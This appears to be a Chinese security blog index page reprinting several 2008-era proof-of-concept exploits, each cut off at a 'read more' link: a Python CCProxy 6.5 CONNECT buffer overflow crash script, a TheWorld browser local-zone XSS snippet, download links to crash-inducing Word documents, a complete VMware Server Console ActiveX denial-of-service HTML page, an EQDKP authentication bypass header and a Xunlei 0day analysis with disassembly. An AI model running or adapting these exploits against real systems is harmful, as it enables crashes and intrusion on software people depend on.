鬼仔's Blog

作者：Friddy

#Author:Friddy
#QQ:568623
#Email:qianyang@ssyeah.com
import sys
import struct
import socket
from time import sleep
prinf "CCproxy 6.5 Connect BufferOverflow POC\nResult:Crash\n"
buf=("CONNECT "+"A"*1100+":443 HTTP/1.0\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)\n"
"Host: www.friddy.cn\n"
"Content-Length: 0\n"
"Proxy-Connection: Keep-Alive\n"
"Pragma: no-cache\x0d\x0a\x0d\x0a")
阅读全文 »

漏洞说明：http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

漏洞分析：世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll /TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏 洞，简单分析如下：

<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];

阅读全文 »

来源:Sowhat的blog

Microsoft Word Bulleted List Handling Remote Memory Corruption Vulnerability

http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-1.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-2.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-3.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-4.doc

或者统一打包 http://packetstormsecurity.org/0806-exploits/msword-crash.tgz

<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
    function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) {
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
 <body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
 </body>
</html>

# milw0rm.com [2008-05-28]

<?php
// EQDKP 1.3.2f Authentication Bypass (PoC)
// vort.fu@gmail.com
阅读全文 »

作者：疯狗
以前一直在传迅雷还有0day，Activex的应该差不多了，但是也不敢怠慢，还是卸载之，今天丰初发来一URL，原来素一迅雷0day，看说明还是远程！感觉装了一个，看那个漏洞监听的端口
C:\>netstat -na|find "36897"
TCP    127.0.0.1:36897        0.0.0.0:0              LISTENING

绑定的本地IP啊？！那就说明这个是不可以远程的，只能本地了。
......
23132CBE    68 B4C61323     push    2313C6B4                         ; ASCII "savepath"
23132CC3    57              push    edi
23132CC4    FFD6            call    esi
23132CC6    59              pop     ecx
23132CC7    84C0            test    al, al

阅读全文 »